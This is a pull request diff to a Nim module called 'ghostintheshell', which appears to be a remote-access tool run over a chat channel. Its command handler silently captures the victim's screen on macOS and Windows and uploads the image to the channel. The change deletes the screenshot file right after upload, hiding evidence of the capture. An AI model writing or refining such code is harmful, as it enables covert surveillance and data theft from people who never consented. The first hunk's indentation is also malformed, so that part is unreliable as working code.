### PR TITLE
Ensure screenshot is deleted immediately after sending

### DIFF
--- a/MODULE/ghostintheshell.nim
+++ b/MODULE/ghostintheshell.nim
@@ -187,7 +187,9 @@ proc handleCommand(rawCmd: string, m: Message, client: HttpClient): Future[strin
       let (output, exitCode) = execCmdEx("screencapture -x " & filePath)
       if exitCode == 0 and fileExists(filePath):
         await sendFile(m.channel_id, filePath, fileName)
-        return "screenshot taken and sent!"
+      if fileExists(filePath):
+        removeFile(filePath)
+      return "screenshot taken, sent and deleted!"
       else:
         return "failed to take screenshot: " & output
     elif defined(windows):
@@ -206,7 +208,9 @@ proc handleCommand(rawCmd: string, m: Message, client: HttpClient): Future[strin
       let (output, exitCode) = execCmdEx(command)
       if exitCode == 0 and fileExists(filePath):
         await sendFile(m.channel_id, filePath, fileName)
-        return "Screenshot taken and sent!"
+        if fileExists(filePath):
+          removeFile(filePath)
+        return "Screenshot taken, sent and deleted!"
       else:
         return "failed to take screenshot: " & output
     else:


### PR DESCRIPTION
- Added removeFile() call after sendFile() to delete the screenshot
  from the working directory immediately after transfer.
- Updated status message to reflect that screenshot is sent and deleted.